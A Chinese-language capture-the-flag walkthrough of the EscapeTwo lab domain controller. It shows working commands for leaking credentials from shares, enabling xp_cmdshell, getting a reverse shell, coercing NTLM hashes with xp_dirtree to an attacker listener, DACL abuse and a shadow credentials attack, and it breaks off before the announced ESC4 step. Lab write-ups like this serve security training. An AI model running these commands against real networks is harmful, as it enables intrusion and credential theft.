从零开始的windows生活-EscapeTwo

飛べよ鵬翼のヴァイオレット　火の鳥のように

We are 何度も歌い強くなった

靶机ip：10.129.186.96

难度：简单

初始凭据： rose / KxEPkKe6R8su

涉及内容：

端口扫描与服务枚举：识别域控制器特征端口 (88, 389, 636) 及关键服务 (MSSQL, SMB)。

SMB 共享错误配置利用：发现非默认共享目录并提取敏感文件。

敏感信息泄露分析：从 .xlsx (XML) 文件和应用程序配置文件 (.ini) 中提取明文凭据。

MSSQL 数据库渗透：利用 sa 账户启用 xp_cmdshell 执行系统命令。

横向移动 (Lateral Movement)：通过凭据复用 (Credential Reuse) 和 WinRM 协议进行横向移动。

域内攻击路径分析：使用 BloodHound 识别隐蔽的 ACL 攻防路径。

DACL 滥用 (ACL Abuse)：利用 WriteOwner 和 GenericAll 权限接管 AD 对象。

影子凭据攻击 (Shadow Credentials)：利用 msDS-KeyCredentialLink 属性获取 NTLM Hash。

AD CS 证书服务攻击 (ESC4)：利用证书模板写权限 (ESC4) 构造高危模板，伪造域管证书。

nmap全端口扫描

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 10.129.186.96 -Pn
Nmap scan report for 10.129.186.96
Host is up (0.13s latency).
Not shown: 65510 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49689/tcp open  unknown
49690/tcp open  unknown
49695/tcp open  unknown
49712/tcp open  unknown
49728/tcp open  unknown
49738/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 760.68 seconds

nmap细节服务探测

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p53,88,135,139,445,464,593,636,1433,3268,3269,5985,9389,47001,49664,49665,49666,49668,49689,49690,49712,49728,49738 -sV -sC -A 10.129.186.96 -Pn
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 00:43 -0500
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 43.48% done; ETC: 00:43 (0:00:10 remaining)
Stats: 0:00:44 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 60.87% done; ETC: 00:44 (0:00:28 remaining)
Stats: 0:01:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.48% done; ETC: 00:44 (0:00:00 remaining)
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 00:44 (0:00:00 remaining)
Nmap scan report for 10.129.186.96
Host is up (0.16s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  tcpwrapped
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-21 05:43:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after:  2124-06-08T17:00:40
|_ssl-date: 2026-01-21T05:45:19+00:00; +6s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-01-21T05:45:19+00:00; +6s from scanner time.
| ms-sql-ntlm-info: 
|   10.129.186.96:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.129.186.96:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-21T05:28:38
|_Not valid after:  2056-01-21T05:28:38
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-21T05:45:19+00:00; +6s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after:  2124-06-08T17:00:40
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after:  2124-06-08T17:00:40
|_ssl-date: 2026-01-21T05:45:19+00:00; +6s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49712/tcp open  msrpc         Microsoft Windows RPC
49728/tcp open  msrpc         Microsoft Windows RPC
49738/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 5s, deviation: 0s, median: 5s
| smb2-time: 
|   date: 2026-01-21T05:44:41
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   165.93 ms 10.10.14.1
2   170.71 ms 10.129.186.96

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.70 seconds

将得到的域名写入hosts

1 2	`┌──(root㉿kaada)-[/home/kali/Desktop] └─# echo "10.129.186.96 DC01.sequel.htb sequel.htb" >> /etc/hosts`

smb服务共享文件探测

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.186.96 -u 'rose' -p 'KxEPkKe6R8su' --shares

SMB         10.129.186.96   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.186.96   445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SMB         10.129.186.96   445    DC01             [*] Enumerated shares
SMB         10.129.186.96   445    DC01             Share           Permissions     Remark
SMB         10.129.186.96   445    DC01             -----           -----------     ------
SMB         10.129.186.96   445    DC01             Accounting Department READ            
SMB         10.129.186.96   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.186.96   445    DC01             C$                              Default share
SMB         10.129.186.96   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.186.96   445    DC01             NETLOGON        READ            Logon server share 
SMB         10.129.186.96   445    DC01             SYSVOL          READ            Logon server share 
SMB         10.129.186.96   445    DC01             Users           READ

得到非默认目录Users，前往探查。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient \\\\10.129.186.96\\Users -U rose
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sun Jun  9 09:42:11 2024
  ..                                 DR        0  Sun Jun  9 09:42:11 2024
  Default                           DHR        0  Sun Jun  9 07:17:29 2024
  desktop.ini                       AHS      174  Sat Sep 15 03:16:48 2018

                6367231 blocks of size 4096. 924175 blocks available
smb: \> get desktop.ini
getting file \desktop.ini of size 174 as desktop.ini (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> cd Default\
smb: \Default\> dir
  .                                 DHR        0  Sun Jun  9 07:17:29 2024
  ..                                DHR        0  Sun Jun  9 07:17:29 2024
  AppData                            DH        0  Sat Sep 15 03:19:00 2018
  Desktop                            DR        0  Sat Sep 15 03:19:00 2018
  Documents                          DR        0  Sat Jun  8 21:29:57 2024
  Downloads                          DR        0  Sat Sep 15 03:19:00 2018
  Favorites                          DR        0  Sat Sep 15 03:19:00 2018
  Links                              DR        0  Sat Sep 15 03:19:00 2018
  Music                              DR        0  Sat Sep 15 03:19:00 2018
  NTUSER.DAT                          A   262144  Sat Jun  8 21:29:57 2024
  NTUSER.DAT.LOG1                   AHS    57344  Sat Sep 15 02:09:26 2018
  NTUSER.DAT.LOG2                   AHS        0  Sat Sep 15 02:09:26 2018
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf    AHS    65536  Sat Jun  8 21:29:57 2024
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Sat Jun  8 21:29:57 2024
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Sat Jun  8 21:29:57 2024
  Pictures                           DR        0  Sat Sep 15 03:19:00 2018
  Saved Games                         D        0  Sat Sep 15 03:19:00 2018
  Videos                             DR        0  Sat Sep 15 03:19:00 2018

                6367231 blocks of size 4096. 924175 blocks available
smb: \Default\>

似乎没有什么值得看的文件，列出用户试试。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.186.96 -u 'rose' -p 'KxEPkKe6R8su' --users 
      ┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.186.96 -u 'rose' -p 'KxEPkKe6R8su' --users
SMB         10.129.186.96   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.186.96   445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SMB         10.129.186.96   445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-                                
SMB         10.129.186.96   445    DC01             Administrator                 2024-06-08 16:32:20 0       Built-in account for administering the computer/domain                                                                                                                                                  
SMB         10.129.186.96   445    DC01             Guest                         2024-12-25 14:44:53 0       Built-in account for guest access to the computer/domain                                                                                                                                                
SMB         10.129.186.96   445    DC01             krbtgt                        2024-06-08 16:40:23 0       Key Distribution Center Service Account 
SMB         10.129.186.96   445    DC01             michael                       2024-06-08 16:47:37 0        
SMB         10.129.186.96   445    DC01             ryan                          2024-06-08 16:55:45 0        
SMB         10.129.186.96   445    DC01             oscar                         2024-06-08 16:56:36 0        
SMB         10.129.186.96   445    DC01             sql_svc                       2024-06-09 07:58:42 0        
SMB         10.129.186.96   445    DC01             rose                          2024-12-25 14:44:54 0        
SMB         10.129.186.96   445    DC01             ca_svc                        2026-01-21 06:02:29 0        
SMB         10.129.186.96   445    DC01             [*] Enumerated 9 local users: SEQUEL

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.186.96 -u 'rose' -p 'KxEPkKe6R8su' 
WINRM       10.129.186.96   5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb) 
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.186.96   5985   DC01             [-] sequel.htb\rose:KxEPkKe6R8su

没有远程操作权限，觉得正常。

没有头绪，返回smb共享文件目录，发现还有一个非默认文件目录Accounting Department（所以刚刚为什么没有发现？还是自己太猪了。）

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient \\\\10.129.186.96\\Accounting\ Department -U rose
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jun  9 06:52:21 2024
  ..                                  D        0  Sun Jun  9 06:52:21 2024
  accounting_2024.xlsx                A    10217  Sun Jun  9 06:14:49 2024
  accounts.xlsx                       A     6780  Sun Jun  9 06:52:07 2024

                6367231 blocks of size 4096. 926603 blocks available
smb: \>

注意这里的空格要加一个转义符。

查看accounts.xlsx 得到账户和密码。我不知道为什么微软的excel打不开下载的文件，只能用更底层的形式查看密码。

权限配置错误：管理员在创建 SMB 共享时，如果权限设置过宽（如允许 Everyone 或 Domain Users 读取），就会导致敏感数据泄露。 Office 文件结构：现代 Office 文档 (.xlsx, .docx) 本质上是 ZIP 压缩包，内部由多个 XML 文件组成。即使没有安装 Office 软件，攻击者也可以解压文件并直接读取 XML 里的 SharedStrings 或元数据，从而绕过某些应用层的保护或直接获取内容。

1
2

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24"><si><t xml:space="preserve">First Name</t></si><si><t xml:space="preserve">Last Name</t></si><si><t xml:space="preserve">Email</t></si><si><t xml:space="preserve">Username</t></si><si><t xml:space="preserve">Password</t></si><si><t xml:space="preserve">Angela</t></si><si><t xml:space="preserve">Martin</t></si><si><t xml:space="preserve">angela@sequel.htb</t></si><si><t xml:space="preserve">angela</t></si><si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si><si><t xml:space="preserve">Oscar</t></si><si><t xml:space="preserve">Martinez</t></si><si><t xml:space="preserve">oscar@sequel.htb</t></si><si><t xml:space="preserve">oscar</t></si><si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si><si><t xml:space="preserve">Kevin</t></si><si><t xml:space="preserve">Malone</t></si><si><t xml:space="preserve">kevin@sequel.htb</t></si><si><t xml:space="preserve">kevin</t></si><si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si><si><t xml:space="preserve">NULL</t></si><si><t xml:space="preserve">sa@sequel.htb</t></si><si><t xml:space="preserve">sa</t></si><si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si></sst>

得到oscar的密码86LxLBMgEWaKUnBG和一个名为sa的账户，密码为MSSQLP@ssw0rd!

合理怀疑是mssql的凭据。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@10.129.186.96
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (sa  dbo@master)> whoami
ERROR(DC01\SQLEXPRESS): Line 1: Could not find stored procedure 'whoami'.
SQL (sa  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> RECONFIGURE;
SQL (sa  dbo@master)> whoami
ERROR(DC01\SQLEXPRESS): Line 1: Could not find stored procedure 'whoami'.
SQL (sa  dbo@master)> EXEC sp_configure 'xp_cmdshell';
name          minimum   maximum   config_value   run_value   
-----------   -------   -------   ------------   ---------   
xp_cmdshell         0         1              1           1   
SQL (sa  dbo@master)> 
SQL (sa  dbo@master)> SELECT DB_NAME() AS CurrentDatabase;
CurrentDatabase   
---------------   
master

使用mdut连接

之后反弹shell到我们的主机上

────────────────────────────────────────────────────────────────────────────────
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from DC01-10.129.186.96-Microsoft_Windows_Server_2019_Standard-x64-based_PC 😍 Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D 
[+] Logging to /root/.penelope/DC01~10.129.186.96_Microsoft_Windows_Server_2019_Standard_x64-based_PC/2026_01_21-01_58_25-198.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
PS C:\Windows\system32> whoami
sequel\sql_svc
PS C:\Windows\system32>

如果执行不了命令，还可以告诉mssql反连我们的主机获取ntlm哈希。

1
2
3

SQL (PublicUser  guest@master)> EXEC xp_dirtree '\\10.10.14.14\share', 1, 1
subdirectory   depth   file   
------------   -----   ----

┌─[root@htb-6um9kvarqx]─[/home/skyarrow]
└──╼ #responder -I tun0 -v
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [OFF]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.14]
    Responder IPv6             [dead:beef:2::100c]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-ZAVFQCGNLOR]
    Responder Domain Name      [3TX9.LOCAL]
    Responder DCE-RPC Port     [49628]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:fcf64b31c2a3898c:3BCC09551D1D2AF07AE1FC417BACF7B7:010100000000000080955E3DCF8CDC01F1F4056C8B8FF8F40000000002000800330054005800390001001E00570049004E002D005A004100560046005100430047004E004C004F00520004003400570049004E002D005A004100560046005100430047004E004C004F0052002E0033005400580039002E004C004F00430041004C000300140033005400580039002E004C004F00430041004C000500140033005400580039002E004C004F00430041004C000700080080955E3DCF8CDC010600040002000000080030003000000000000000000000000030000095F1B218230F88C721FADA85FD436ADC639F4CE6E9517CD563B25EA04D2B9DF10A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310034000000000000000000
[+] Exiting...

之后搜集敏感数据。

PS C:\Windows\system32> cd C:\SQL2019\
PS C:\SQL2019> cd ExpressAdv_ENU
PS C:\SQL2019\ExpressAdv_ENU> dir


    Directory: C:\SQL2019\ExpressAdv_ENU


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----         6/8/2024   3:07 PM                1033_ENU_LP                                                           
d-----         6/8/2024   3:07 PM                redist                                                                
d-----         6/8/2024   3:07 PM                resources                                                             
d-----         6/8/2024   3:07 PM                x64                                                                   
-a----        9/24/2019  10:03 PM             45 AUTORUN.INF                                                           
-a----        9/24/2019  10:03 PM            788 MEDIAINFO.XML                                                         
-a----         6/8/2024   3:07 PM             16 PackageId.dat                                                         
-a----        9/24/2019  10:03 PM         142944 SETUP.EXE                                                             
-a----        9/24/2019  10:03 PM            486 SETUP.EXE.CONFIG                                                      
-a----         6/8/2024   3:07 PM            717 sql-Configuration.INI                                                 
-a----        9/24/2019  10:03 PM         249448 SQLSETUPBOOTSTRAPPER.DLL                                              


PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False" 
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
PS C:\SQL2019\ExpressAdv_ENU>

发现了一段密码。

密码喷洒后，发现使用这个密码可以登录ryan的账户，还有winrm权限。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm 10.129.186.96 -u 'ryan' -p 'WqSZAF6CysDQbGb3' 
[*] Initializing MSSQL protocol database
WINRM       10.129.186.96   5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb) 
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.186.96   5985   DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!)

*Evil-WinRM* PS C:\Users\ryan\Desktop> type user.txt
64d73a79bf4dcff891c4564ca29a1a46
*Evil-WinRM* PS C:\Users\ryan\Desktop> 
*Evil-WinRM* PS C:\Users\ryan\Desktop>

上传sharphound收集信息并下载。

*Evil-WinRM* PS C:\Users\ryan\Desktop> upload SharpHound.exe
                                        
Info: Uploading /home/kali/Desktop/SharpHound.exe to C:\Users\ryan\Desktop\SharpHound.exe
                                        
Data: 1713492 bytes of 1713492 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Desktop> .\SharpHound.exe -c All
2026-01-20T23:07:52.0226894-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2026-01-20T23:07:52.2258431-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-01-20T23:07:52.2414344-08:00|INFORMATION|Initializing SharpHound at 11:07 PM on 1/20/2026
2026-01-20T23:07:52.2883092-08:00|INFORMATION|Resolved current domain to sequel.htb
2026-01-20T23:07:52.4289377-08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-01-20T23:07:52.5227121-08:00|INFORMATION|Beginning LDAP search for sequel.htb
2026-01-20T23:07:52.6164364-08:00|INFORMATION|Beginning LDAP search for sequel.htb Configuration NC
2026-01-20T23:07:52.6476894-08:00|INFORMATION|Producer has finished, closing LDAP channel
2026-01-20T23:07:52.6476894-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2026-01-20T23:07:52.6633111-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2026-01-20T23:07:52.6633111-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2026-01-20T23:07:53.0070972-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2026-01-20T23:08:00.3351926-08:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2026-01-20T23:08:00.3664322-08:00|INFORMATION|Output channel closed, waiting for output task to complete
2026-01-20T23:08:00.6321599-08:00|INFORMATION|Status: 348 objects finished (+348 43.5)/s -- Using 41 MB RAM
2026-01-20T23:08:00.6321599-08:00|INFORMATION|Enumeration finished in 00:00:08.1214295
2026-01-20T23:08:00.8682785-08:00|INFORMATION|Saving cache with stats: 18 ID to type mappings.
 1 name to SID mappings.
 1 machine sid mappings.
 4 sid to domain mappings.
 0 global catalog mappings.
2026-01-20T23:08:00.8978829-08:00|INFORMATION|SharpHound Enumeration Completed at 11:08 PM on 1/20/2026! Happy Graphing!
*Evil-WinRM* PS C:\Users\ryan\Desktop>

*Evil-WinRM* PS C:\Users\ryan\Desktop> download 20260120230753_BloodHound.zip
                                        
Info: Downloading C:\Users\ryan\Desktop\20260120230753_BloodHound.zip to 20260120230753_BloodHound.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\ryan\Desktop>

使用bloodhound分析信息，发现ryan对ca_svc有writeowner权限

并且ca_svc是证书发布者。

那么整个的攻击链就是ryan——ca_svc——恶意证书发布——域控。

ryan 对用户 ca_svc 拥有 WriteOwner 权限。

ca_svc 是 Cert Publishers 组的成员。

Cert Publishers 组对 DunderMifflinAuthentication 证书模板拥有写权限。

利用该模板进行 AD CS ESC4 攻击提权。

先拿到ca再说。

既然拥有writeowner权限，那么可以将ca_svc所有权改为自己

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# # 语法：bloodyAD --host <DC_IP> -d <域名> -u ryan -p <密码> set owner <目标用户> <新所有者>
bloodyAD --host 10.129.186.96 -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' set owner ca_svc ryan
[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc

然后修改ACL，给自己GenericAll权限。

1
2
3

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD --host 10.129.186.96 -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add genericAll ca_svc ryan
[+] ryan has now GenericAll on ca_svc

或者这样也可以

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-dacledit  -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20260121-024829.bak
[*] DACL modified successfully!

[核心原理深度剖析] DAC 自主访问控制

DACL 与 Owner 机制：Windows 的安全对象包含一个 DACL (Discretionary Access Control List)。 提权逻辑：操作系统规定，对象的所有者 (Owner) 永远有权修改该对象的 DACL (WRITE_DAC)。 攻击链：拥有 WriteOwner -> 修改 Owner 为自己 -> 此时拥有修改 ACL 的权利 -> 给自己添加 GenericAll (Full Control) -> 彻底控制目标对象。

之后本来想配置影子凭据获取ca_svc的哈希的但是一直报错，只能改密码了。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad shadow auto -u 'ryan@sequel.htb' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.129.186.96'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[-] Got error: socket connection error while opening: timed out
[-] Use -debug to print a stacktrace

但是重置靶机之后又好了。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─#  certipy shadow auto -u ryan@sequel.htb -p WqSZAF6CysDQbGb3 -account 'ca_svc' -dc-ip 10.129.186.117
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'ac8531c5-99b8-8310-0b81-bb01fd9ff206'
[*] Adding Key Credential with device ID 'ac8531c5-99b8-8310-0b81-bb01fd9ff206' to the Key Credentials for 'ca_svc'
